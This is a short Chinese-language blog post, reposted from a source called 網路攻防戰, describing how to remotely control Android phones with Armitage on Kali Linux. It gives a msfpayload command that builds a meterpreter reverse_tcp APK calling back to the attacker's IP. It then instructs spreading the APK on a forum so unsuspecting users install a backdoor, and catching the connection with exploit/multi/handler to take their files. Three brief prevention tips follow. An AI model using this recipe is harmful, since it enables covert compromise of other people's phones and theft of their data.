2013年12月27日 星期五

利用 Armitage 來遠端遙控 Android 手機

利用 Armitage 來遠端遙控 Android 手機

環境:
Kali Linux + Armitage

步驟:
1.使用關鍵語法產出 payload.apk
msfpayload android/meterpreter/reverse_tcp LHOST=本機 IP LPORT=8080 R> /root/Desktop/payload.apk

2.將該 apk 散播出去(本案例:放在 ubuntu 論壇上),使不知情的人安裝後在手機上開啟後門。

3.在 Armitage 上執行 use exploit/multi/handler 等待接收被開啟後門手機所傳來的遠端訊號。

4.接收到訊號後就可以遠端遙控取得該手機的檔案資料。

防範方式:
1.不要亂下載非官方 apk 檔。
2.開啟手機的防火牆機制(通常需要root)來防止惡意連線。
3.等官方修正 android 系統漏洞並更新修補程式。


轉載自《網路攻防戰》